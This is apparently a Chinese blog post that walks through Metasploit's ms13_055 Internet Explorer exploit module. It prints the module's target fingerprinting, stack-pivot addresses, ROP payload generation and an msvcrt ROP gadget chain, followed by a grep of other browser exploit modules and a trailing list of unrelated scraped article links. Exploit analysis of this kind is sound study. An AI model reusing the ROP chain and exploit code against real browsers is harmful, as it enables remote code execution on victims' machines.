ms13_055 metasploit
111 def get_payload(t)
112 if t['Rop'] == :msvcrt
113 print_status("Using msvcrt ROP")
114 esp_align = "\x81\xc4\x54\xf2\xff\xff"
115 rop_dll = 'msvcrt'
116 opts = {'target'=>'xp'}
117 else
118 print_status("Using JRE ROP")
119 esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
120 rop_dll = 'java'
121 opts = {}
122 end
daniel@daniel-mint ~/ms13_055 $ echo "81 c4 54 f2 ff ff" | ascii2binary -b h -t uc | x86dis -e 0 -s inte
l00000000 81 C4 54 F2 FF FF add esp, 0xFFFFF254
daniel@daniel-mint ~/ms13_055 $ echo "81 ec f0 d8 ff ff" | ascii2binary -b h -t uc | x86dis -e 0 -s intel
00000000 81 EC F0 D8 FF FF sub esp, 0xFFFFD8F0
esp_align代表的汇编语句的作用是对齐esp,即栈指针。
87 def get_target(agent)
88 return target if target.name != 'Automatic'
89
90 nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
91 ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
92
93 ie_name = "IE #{ie}"
94
95 case nt
96 when '5.1'
97 os_name = 'Windows XP SP3'
98 when '6.1'
99 os_name = 'Windows 7'
100 end
101
102 targets.each do |t|
103 if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
104 return t
105 end
106 end
107
108 nil
109 end
188 def on_request_uri(cli, request)
189 agent = request.headers['User-Agent']
190 t = get_target(agent)
当远程的网页客户端发出HTTP请求页面时,get_target会根据请求Header中的User-Agent信息来了解客户端操作系统以及浏览器的版本情况,然后根据预设的情况来
返回与版本相关的数据
52 'Targets' =>
53 [
54 [ 'Automatic', {} ],
55 [
56 'IE 8 on Windows XP SP3',
57 {
58 'Rop' => :msvcrt,
59 'Pivot' => 0x77c15ed5, # xchg eax, esp; ret
60 'Align' => 0x77c4d801 # add esp, 0x2c; ret
61 }
62 ],
63 [
64 'IE 8 on Windows 7',
65 {
66 'Rop' => :jre,
67 'Pivot' => 0x7c348b05, # xchg eax, esp; ret
68 'Align' => 0x7C3445F8 # add esp, 0x2c; ret
69 }
70 ]
71 ],
如果当前的系统不支持,就会返回404页面。
111 def get_payload(t)
112 if t['Rop'] == :msvcrt
113 print_status("Using msvcrt ROP")
114 esp_align = "\x81\xc4\x54\xf2\xff\xff"
115 rop_dll = 'msvcrt'
116 opts = {'target'=>'xp'}
117 else
118 print_status("Using JRE ROP")
119 esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
120 rop_dll = 'java'
121 opts = {}
122 end
123
124 p = esp_align + payload.encoded + rand_text_alpha(12000)
125 generate_rop_payload(rop_dll, p, opts)
126 end
generate_rop_payload
77 def generate_rop_payload(rop, payload, opts={})
78 nop = opts['nop'] || nil
79 badchars = opts['badchars'] || ''
80 pivot = opts['pivot'] || ''
81 target = opts['target'] || ''
82 base = opts['base'] || nil
83
84 rop = select_rop(rop, {'target'=>target, 'base'=>base})
85 # Replace the reserved words with actual gadgets
86 rop = rop.map {|e|
87 if e == :nop
88 sled = (nop) ? nop.generate_sled(4, badchars).unpack("V*")[0] : 0x90909090
89 elsif e == :junk
90 Rex::Text.rand_text(4, badchars).unpack("V")[0].to_i
91 elsif e == :size
92 payload.length
93 elsif e == :unsafe_negate_size
94 get_unsafe_size(payload.length)
95 elsif e == :safe_negate_size
96 get_safe_size(payload.length)
97 else
98 e
99 end
100 }.pack("V*")
101
102 raise RuntimeError, "No ROP chain generated successfully" if rop.empty?
103
104 return pivot + rop + payload
105 end
会从data目录下查找定义好的[module].xml的文件,然后将gadgets中的宏定义展开,然后与pivot + gadgets + payload返回。
3 <rop>
4 <compatibility>
5 <target>WINDOWS XP SP2</target>
6 <target>WINDOWS XP SP3</target>
7 </compatibility>
8
9 <gadgets base="0x77c10000">
10 <gadget offset="0x0002b860">POP EAX # RETN</gadget>
11 <gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
12 <gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
13 <gadget value="junk">JUNK</gadget>
14 <gadget offset="0x0001362c">POP EBX # RETN</gadget>
15 <gadget offset="0x0004d9bb">Writable location</gadget>
16 <gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget>
17 <gadget offset="0x00040d13">POP EDX # RETN</gadget>
18 <gadget value="0xFFFFFFC0">0xFFFFFFC0-> edx</gadget>
19 <gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
20 <gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget>
21 <gadget value="junk">JUNK</gadget>
22 <gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
23 <gadget offset="0x0002ee15">POP EBP # RETN</gadget>
24 <gadget offset="0x0002ee15">skip 4 bytes</gadget>
25 <gadget offset="0x0002eeef">POP ECX # RETN</gadget>
26 <gadget offset="0x0004d9bb">Writable location</gadget>
27 <gadget offset="0x0001a88c">POP EDI # RETN</gadget>
28 <gadget offset="0x00029f92">RETN (ROP NOP)</gadget>
29 <gadget offset="0x0002a184">POP ESI # RETN</gadget>
30 <gadget offset="0x0001aacc">JMP [EAX]</gadget>
31 <gadget offset="0x0002b860">POP EAX # RETN</gadget>
32 <gadget offset="0x00001120">ptr to VirtualProtect()</gadget>
33 <gadget offset="0x00002df9">PUSHAD # RETN</gadget>
34 <gadget offset="0x00025459">ptr to 'push esp # ret</gadget>
35 </gadgets>
36 </rop>
在查找Windows下Browser相关的ROP漏洞
daniel@daniel-mint ~/msf/metasploit-framework/modules/exploits/windows/browser $ grep generate_rop_payload *.rb -n
adobe_flash_mp4_cprt.rb:148: code = generate_rop_payload(rop_name, code, {'target'=>rop_target})
adobe_flash_otf_font.rb:100: p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.257', 'pivot'=>pivot})
adobe_flash_otf_font.rb:110: p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.265', 'pivot'=>pivot})
adobe_flash_otf_font.rb:120: p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.268', 'pivot'=>pivot})
adobe_flash_otf_font.rb:130: p = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})
adobe_flashplayer_flash10o.rb:194: p = generate_rop_payload('java', payload.encoded)
adobe_flash_rtmp.rb:135: code << generate_rop_payload('msvcrt', p, {'target'=>'xp'})
adobe_toolbutton.rb:77: rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' }))
adobe_toolbutton.rb:78: rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' }))
aladdin_choosefilepath_bof.rb:147: p = generate_rop_payload('msvcrt', get_payload(cli, target_info), {'target'=>'xp'})
apple_quicktime_mime_type.rb:153: code = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
apple_quicktime_rdrf.rb:65: p = generate_rop_payload('msvcrt', alignment + payload.encoded, {'target'=>'xp'})
crystal_reports_printcontrol.rb:178: rop_payload = generate_rop_payload('java', code, {'pivot' => [t['Pivot']].pack("V")})
hp_loadrunner_writefilebinary.rb:207: rop_payload = fake_object + generate_rop_payload('java', code)#, {'pivot'=>stack_pivot})
ie_cbutton_uaf.rb:148: rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'xp'})
ie_cbutton_uaf.rb:150: rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'2003'})
ie_cbutton_uaf.rb:153: rop_payload = generate_rop_payload('java', java_align + code)
ie_cgenericelement_uaf.rb:126: rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})
ie_cgenericelement_uaf.rb:128: rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})
ie_cgenericelement_uaf.rb:136: rop_payload = generate_rop_payload('java', code)
ie_execcommand_uaf.rb:139: rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
ie_execcommand_uaf.rb:158: rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
ie_setmousecapture_uaf.rb:98: rop = generate_rop_payload('hxds', code, { 'target'=>'2007' })
ie_setmousecapture_uaf.rb:112: rop = generate_rop_payload('hxds', code, { 'target'=>'2010' })
indusoft_issymbol_internationalseparator.rb:219: rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
indusoft_issymbol_internationalseparator.rb:231: rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
inotes_dwa85w_bof.rb:204: rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'})#{'pivot'=>stack_pivot, 'target'=>'xp'})
mozilla_firefox_onreadystatechange.rb:108: code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})
mozilla_firefox_xmlserializer.rb:110: code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})
ms10_002_ie_object.rb:248: rop_payload = generate_rop_payload('msvcrt', p, {'target'=>'xp'})
ms10_002_ie_object.rb:250: rop_payload = generate_rop_payload('java', p)
ms11_050_mshtml_cobjectelement.rb:182: rop_payload = generate_rop_payload('java', p)
ms11_081_option.rb:137: rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'})
ms11_081_option.rb:144: rop_payload = generate_rop_payload('java', '')
ms12_004_midi.rb:519: generate_rop_payload('msvcrt', p, {'pivot'=>padding, 'target'=>'xp'})
ms12_037_same_id.rb:133: rop = generate_rop_payload('msvcrt', '', {'target'=>'xp', 'pivot'=>pivot})
ms12_037_same_id.rb:137: rop = generate_rop_payload('java', '', {'pivot'=>pivot})
ms13_009_ie_slayoutrun_uaf.rb:128: rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'})
ms13_037_svg_dashstyle.rb:218: rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
ms13_055_canchor.rb:125: generate_rop_payload(rop_dll, p, opts)
ms13_059_cflatmarkuppointer.rb:120: generate_rop_payload('java', code, {'pivot'=>stack_pivot})
ms13_069_caret.rb:97: p << generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
ms13_080_cdisplaypointer.rb:157: rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2007', 'pivot'=>pivot})
ms13_080_cdisplaypointer.rb:174: rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>pivot})
ms13_080_cdisplaypointer.rb:186: rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp', 'pivot'=>pivot})
ms13_080_cdisplaypointer.rb:197: rop_payload = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})
ms13_090_cardspacesigninhelper.rb:108: rop_payload = generate_rop_payload('msvcrt', get_payload(cli, target_info), {'target'=>'xp', 'pivot' => stack_pivot})
ms14_012_textrange.rb:85: p = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>setup})
msxml_get_definition_code_exec.rb:189: rop = generate_rop_payload('msvcrt','',{'target'=>'xp', 'pivot'=>adjust})
msxml_get_definition_code_exec.rb:193: rop = generate_rop_payload('java','',{'pivot'=>adjust})
novell_groupwise_gwcls1_actvx.rb:207: rop_payload = generate_rop_payload('msvcrt', '', 'target'=>'xp') # Mapped at 0x0c0c07ea
novell_groupwise_gwcls1_actvx.rb:217: rop_payload = generate_rop_payload('java', '') # Mapped at 0x0c0c07ea
ntr_activex_check_bof.rb:270: rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'})
ntr_activex_check_bof.rb:274: rop_payload = generate_rop_payload('java', code)
quickr_qp2_bof.rb:202: rop_payload = generate_rop_payload('java', code)#, {'pivot'=>stack_pivot})
siemens_solid_edge_selistctrlx.rb:398: return generate_rop_payload('msvcrt', payload.encoded, {'pivot'=> fake_memory, 'target'=>'xp'})
vlc_amv.rb:143: code = generate_rop_payload('java', payload.encoded)
ms13_055 metasploit的更多相关文章
- Metasploit各版本对比
功能特性 描述 Metasploit Framework Metasploit Community Metasploit Express Metasploit Pro Pricing ...
- 关于kali2.0rolling中metasploit升级后无法启动问题的解决总结
最近在学习metasploit的使用,文中提到可以使用msfupdate命令来对metasploit的payload.exploit等进行升级,我就试了一下,没想到升级过程并不麻烦,但升级后却出现了无 ...
- [转]初探Metasploit的自动攻击
1. 科普Metasploit 以前只是个Back Track操作系统(简称:BT) 下的攻击框架,自成继承了后攻击渗透模块,隐隐有成为攻击平台的趋势. 我们都戏称它为美少妇,很简单,msf. 它 ...
- 移动安全初探:窃取微信聊天记录、Hacking Android with Metasploit
在这篇文章中我们将讨论如何获取安卓.苹果设备中的微信聊天记录,并演示如何利用后门通过Metasploit对安卓设备进行控制.文章比较基础.可动手性强,有设备的童鞋不妨边阅读文章边操作,希望能激发大家对 ...
- metasploit渗透初探MR.robot(一)
看了MR.robot,有一种研究渗透技术的冲动, 网上也看了些教程,要从kali linux说起, 下载vmware 12,http://www.vmware.com/go/tryworkstatio ...
- metasploit用法
1.msfconsole 进入metasploit 2.help connect 查看帮助 3.msfcli -h 查看帮助 4.ms08_067_netapi O 字符命令后加“O”,查看配置 5. ...
- chapter1 渗透测试与metasploit
网络对抗技术课程学习 chapter1 渗透测试与metasploit 一.读书笔记 二.渗透测试 通过模拟恶意攻击者的技术与方法进行攻击,挫败目标系统安全控制措施,取得访问控制权,并发现具备业务影响 ...
- 原创教程:《metasploit新手指南》介绍及下载
原创教程:<metasploit新手指南>介绍及下载 1.1 作者简介 这份教程并不是“玄魂工作室”原创,但是我还是要力推给大家.相比那些一连几年都在问“我怎么才能入门”的人而言,我们更欣 ...
- kali 2.0 启动metasploit服务
kali 2.0 已经没有metasploit 这个服务了,所以service metasploit start 的方式不起作用. 在kali 2.0中启动带数据库支持的MSF方式如下: 首先启动po ...
随机推荐
- PHP-Redis扩展安装(四)
PHP-Redis扩展安装(四) 安装环境链接:http://pan.baidu.com/s/1i4IbJox Memecached 服务器安装(一) memcached php扩展(二) redis ...
- [360前端星计划]BlackJack(21点)(纯JS,附总部学习笔记)
[360前端星计划]总部学习笔记(6/6) [360前端星计划]详情跳转 游戏界面预览 目录 一.游戏介绍 1.起源 2.规则 3.技巧 二.游戏设计 1.整体UI构思 2.素材采集 3.游戏总规划 ...
- 数论---lcm和gcd
cd即最大公约数,lcm即最小公倍数. 首先给出a×b=gcd×lcm 证明:令gcd(a,b)=k,a=xk,b=yk,则a×b=xykk,而lcm=xyk,所以ab=gcd*lcm. 所以求lcm ...
- 插件化框架解读之android系统服务实现原理(五)
阿里P7移动互联网架构师进阶视频(每日更新中)免费学习请点击:https://space.bilibili.com/474380680 一.系统服务提供方式 1.我们平时最常见的系统服务使用方式 Wi ...
- uWSGI、WSGI、uwsgi、wsgiref、werkzeug
WSGI WSGI:全称是Web Server Gateway Interface,WSGI不是服务器,也不是python模块.框架.API或者任何软件,只是一种规范,描述web server如何与w ...
- 图推荐-基于随机游走的personrank算法
转自http://blog.csdn.net/sinat_33741547/article/details/53002524 一 基本概念 基于图的模型是推荐系统中相当重要的一种方法,以下内容的基本思 ...
- Java调用DB的存储过程
2015/12/7 使用数据库存储过程的java代码: try { con = (Connection) DBProxy.getConnection(null); ...
- windows10 Bash on Ubuntu 安装pygame
在bash命名行下执行以下三个命令1.下载pip2.apt-get install python3-setuptools3.python3 setup.py install以管理员身份运行cmd,执行 ...
- MyEclipse更换工作空间报错自动退出
2.解决方法 后来找到一种方法,解决了我的问题,即找到图二中报错的那个jar包,我的是com.genuitec.eclipse.core_14.0.0.me201602080330.jar,然后将其文 ...
- 使用await写异步优化代码
使用promise: function readMsg(){ return dispatch=>{ axios.post('/msgList').then(res=>{ console.l ...